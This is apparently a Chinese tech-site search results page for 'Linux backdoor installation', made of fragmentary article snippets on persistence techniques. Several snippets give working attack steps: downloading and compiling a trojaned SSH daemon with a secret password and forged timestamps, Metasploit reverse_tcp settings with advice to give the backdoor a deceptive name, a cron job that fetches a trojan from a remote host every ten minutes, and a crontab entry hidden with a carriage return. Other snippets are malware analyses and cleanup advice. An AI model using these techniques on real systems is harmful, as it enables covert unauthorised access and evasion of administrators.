展开

关键词

Linux安装后门程序

ssh/ssh_config /etc/ssh/ssh_config.old 2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old 3、下载并安装ssh后门 : 将sshdb.tgz后门程序放置到你自己的服务器的某目录下,并且改成为test.tgz,这里为www.test.com的根目录下 # wget http://www.test.com/test.tgz # tar zxvf test.tgz # cd openssh 4、设置ssh后门的登录密码: vi includes.h define _SECRET_PASSWD "test1234" -> #test1234位后门连接密码 5、编译安装: # . ssh_config touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config 重启服务 # /etc/init.d/sshd restart 6、登入后门

580110

『权限维持系列』- 屏幕保护程序后门

这是因为屏幕保护程序是具有.scr文件扩展名的可执行文件,并通过scrnsave.scr实用程序执行。 windows/x64/meterpreter/reverse_tcp set LHOST IP_Address set target 2 exploit 总结 修改完注册表之后,屏保修改处就会显示该后门程序的名称 所以,后门程序的名字一定要起的有迷惑性,使对方信任。 其次,关闭该后门的方法也很简单,在上述图片位置中,切换屏保程序即可,注册表中的数据就会被修改,但是后门程序并未被删除,所以,若要清除后门,我们需要先在注册表中查看后门程序的路径,才可以彻底删除。 使用此后门时一定要注意,目标机器原本是否有屏保程序。若原本就有屏保程序,此后门的设置应尽量与修改前的图片相符。我们使用msf生成的木马时,将无屏保动画显示。

60740
  • 广告
    关闭

    什么是世界上最好的编程语言?丨云托管征文活动

    代金券、腾讯视频VIP、QQ音乐VIP、QB、公仔等奖励等你来拿!

  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    vim 后门 | Linux 后门系列

    57320

    SSH Config 后门 | Linux 后门系列

    Ubuntu server 16.04 默认 /etc/ssh/ssh_config

    43130

    alias后门 | Linux 后门系列

    %h%m%s'`.log -e read,write,connect -s2048 ssh' 上面是我搜索了10多篇文章,发现的同一条后门命令,既然有前辈写了,咱们就分析分析 上面后门中,其实 alias 我了解了一下,发现 strace 是一个巨牛的工具,堪称神奇,简单来说它是一个调试工具,实际来说,他能把你这个程序在干啥整得明明白白 strace能做什么? 调试性能问题,查看系统调用的频率,找出耗时的程序段 查看程序读取的是哪些文件从而定位比如配置文件加载错误问题 查看某个php脚本长时间运行“假死”情况 当程序出现“Out of memory”时被系统发出的 ,记录明文密码,这局限性太大了,顶多可以作为一个后门辅助。 后门 ?

    1.1K30

    LD_PRELOAD 后门 | Linux 后门系列

    加固后门 正常大家检查是否存在 LD_PRELOAD 后门的时候都是直接 echo $LD_PRELOAD ? 设置后门后是这样的 ? alias 劫持显示 这个简单了,把这些字符替换成空就行了 ? 咱们把劫持 unalias 和劫持 alias 放在最后,先把这些命令都劫持一下: env 没有后门时候是这样的 ? 设置了后门之后是这样的 ? 成功劫持 export 没有设置后门时候是这样的 ? 设置后门后是这样的 ? 劫持成功 现在我们来进行验证后门还好用吗 ? 可以看到后门可以使用,那么现在我们来看一下以上各种方法还能否看见我们做的手脚 ? 完美!

    1.8K20

    CGI后门

    9540

    计划任务后门 | Linux 后门系列

    3 * * * rm -r /home/xxxx/test/* 每隔10分钟下载一下我们的木马 */10 * * * * wget http://www.test.com/muma.exe 0x05 后门利用 0x06 巧用计划任务留后门 (crontab -l;printf "*/1 * * * * /home/helper/1.sh;\rno crontab for `whoami`%100c\n")|crontab

    1.4K40

    一款功能丰富的Perl后门程序分析

    最近通过Cowrie蜜罐捕获一枚有趣的后门程序,此程序用perl语言编写。 二、行为分析: 程序启动后调用conectar函数建立与远程服务器的连接,服务器IP地址:118.178.190.138 端口:9981 ? 测试机运行效果: ? 此程序核心内容皆在bfunc函数里,因此后续主要分析这个函数。bfunc函数依据传入的指令参数有如下功能: ①结束进程: ? ②列出可处理的指令: ? ③进行常见的DDoS攻击: ? 四、总结 这个后门程序类似于之前网上有报过的名为” DDoS Perl Bot v1.0”的后门程序,只是功能上要丰富许多,作者应该是国外的,被国内黑客通过修改远程server的IP进行定制,从而实现与自己的 可以跨平台,对于安装了Perl解释器的Windows系统同样可以实现部分功能,不过主要还是针对Linux系统威胁较大,用于渗透后植入后门

    791100

    cc++----网站及其后门(CGI应用程序)

    C/C++学习到这儿,结合自己曾经学过的javasweb知识,现在让我们来看看,如何做一个CGI程序吧!       首先了解一下啥子叫CGI  :CGI全称是“公共网关接口”(Common Gateway Interface),HTTP服务器与你的或其它机器上的程序进行“交谈”的一种工具,其程序须运行在网络服务器上。

    82040

    MOTD 后门引发的思考 | Linux 后门系列

    最近看了苑房弘老师的打靶课程,发现了 MOTD 这个东西,于是研究了一下,发现很适合做后门,早在08年以前就有恶意软件使用了这种方式,今天系统地研究一下 motd,全称Message Of The Day root权限 留后门 这个目录下的所有文件在任意用户登录后都会执行一遍,所以我们可以选择新建一个脚本或者修改其中的脚本来完成留后门的目的 以 00-header 文件为例 #! (uname -m)" 经过上面分析 50-motd-news ,我相信这里没有什么难度,就是打印一些信息 需要注意的是这里加载了一个配置文件 /usr/bin/lsb_release,执行了一个程序 来加载配置文件呀,这完全可以作为一个单独的后门方式去讲,但这里已经讲了就不单独开章节了 我们在 Ubuntu 18.04 中简单搜索一下 粗略的计算有 196 个 这就是说这些文件中我们都可以塞进去一些恶意程序 这个可扩展性太强了,我在之前的文章中已经说过一部分了,大家可以继续思考,做出更多隐蔽的后门方法,同时呢,也是给这些做应急响应的兄弟提个醒,可以从某些角度去发现恶意程序 motd 脚本中涉及的 python

    18600

    后门攻击

    什么是后门 后门程序是一种恶意软件类型,它会阻止正常的身份验证过程访问系统。因此,远程访问被授予应用程序内的资源,例如数据库和文件服务器,从而使犯罪者能够远程发布系统命令并更新恶意软件。 后门安装是通过利用Web应用程序中易受攻击的组件来实现的。一旦安装,检测是困难的,因为文件往往被高度混淆。 它启动第二阶段 - 在服务器上下载并安装后门脚本。 后门壳去除的挑战 一旦安装,后门是非常难以清除的。传统上,检测涉及使用软件扫描程序在服务器文件系统中搜索已知的恶意软件签名。 后门外壳文件几乎总是通过使用别名和更重要的代码混淆(有时甚至是多层加密)来屏蔽。 由于许多应用程序构建在使用第三方插件的外部框架上,所以检测更加复杂; 这些有时会带有漏洞或内置后门。 即使检测到后门,典型的缓解方法(甚至系统重新安装)也不可能将其从应用程序中移除。对于在可重写存储器中持续存在的后门来说尤其如此。

    1.3K30

    安全部门监测发现恶意后门程序新变种

    国家网络安全部门通过对互联网的监测发现,近期出现一种恶意后门程序变种Backdoor_Parite.B. 该变种是一个远程控制程序,它会释放一个恶意动态链接库DLL文件用于感染文件,随后连接远程Web地址进而执行更多的恶意操作。 变种运行后,首先会获得受感染操作系统的临时文件夹路径,并在临时文件夹下释放恶意程序并加载执行,该程序是动态链接库DLL组件。 针对已经感染该恶意后门程序变种的计算机用户,专家建议立即升级系统中的防病毒软件,进行全面杀毒。

    38670

    PowerShell-RAT:一款基于Python的后门程序

    今天给大家介绍的是一款名叫Powershell-RAT的Python后门,它可以利用Gmail邮件附件来从目标用户的设备中提取数据。 选项5:该选项将使用schtasks在目标设备上安装后门,并将任务名设置为MicrosoftAntiVirusCriticalUpdatesUA。 选项7:该选项将使用schtasks在目标设备上安装后门,并将任务名设置为MicrosoftAntiVirusCriticalUpdatesDF。 选项9:退出程序(或按 Control+C)。 工具界面 首次运行Powershell-RAT时你将会看到如下图所示的选项界面: ? 使用Hail Mary选项可以帮助你在目标Windows设备中安装后门: ? 配置完成之后,你就可以查看到用户的活动截图了: ?

    43650

    利用白文件打造超级渗透测试后门程序的思路分享

    前言 计算机中的后门程序,品种多样。有Telnet、IFEO 、WebShell、注册表、Radmin等。大部分后门都会在一段时间内被AV检测到,并清除。 通过修改木马源码制作的后门,几乎无法长期驻留在系统中,需要使用白文件,例如Radmin、TeamView、FreeSSH等。因为是合法程序,所以AV不会清除。 安装过程会创建一个系统服务,下次开机自动运行后门。如图4 ? 图4 服务 安装完成后,双击图标,来配置用户SSH,如图5 ? 图8 最后,后门“安装->配置”,就大功告成了,现在,使用xshell连接,如图9 ? 图10 图中FreeSSHDService.ini是后门的主配置文件。里面记录着RSA公钥的位置和TCP端口,账号,密码等信息。

    35110

    PhpStudy 后门分析

    在拿到样本后,我就对PhpStudy中的后门进行了一波逆向分析。 2. 后门分析 最近关于讲phpstudy的文章很多,不过我只得到一个信息,后门在php_xmlrpc.dll文件中,有关键词:"eval(%s(%s))"。得知这个信息后,就降低了前期的工作难度。 研究了后门类型后,再来看看什么情况下会进入该函数触发该后门。 从这里可以知道,只要php成功加载了存在后门的xmlrpc.dll,那么任何只要构造对应的后门请求头,那么就能触发后门。在Nginx服务器的情况下就算请求一个不存在的路径,也会触发该后门。 修复方案也很简单,把php的php_xmlrpc.dll替换成无后门的版本,或者现在直接去官网下载,官网现在的版本经检测都不存后门

    29840

    WMI型后门

    8620

    常见后门解释

    后门的存在大部分的情况是在公司内部已经被入侵的情况下,如何清理后门是作为安全人员的一大难题,想要清理后门必须要对后门的种类、可能存在位置以及不同后门的特性了如指掌,需要知道攻击者留后门的各种手法,你只有懂的比攻击者多那么你才能发现它留下后门的踪迹 2、Shift后门 我们知道windows系统在到达远程登录界面的情况下,连续点击五次shift会激活c:winowssystem32setchx.exe,我们可以用我们的后门程序代替这个程序,然后点击五次 以此类推,我们在远程登录界面的情况下能使用程序都可以利用像放大镜后门。 3、木马后门 远控木马的种类很多,像Gh0st、灰鸽子、冰河等。 3、回连后门 类似于Windows的木马程序在特定的时间主动连接控制端,形成一个远程shell。 4、服务后门 通过修改Linux上运行的各种服务,以特定的方式激活后门程序,如rootkit、web服务器的webshell等。

    84540

    相关产品

    • 小程序安全

      小程序安全

      小程序安全针对小程序不同业务场景提供包括小程序安全加固、小程序安全扫描、小程序渗透测试功能,通过分析仿冒程序,挖掘风险漏洞、保护核心代码等方法保护小程序业务安全、数据安全,降低客户业务风险和资金损失。

    相关资讯

    热门标签

    活动推荐

      运营活动

      活动名称
      广告关闭

      扫码关注云+社区

      领取腾讯云代金券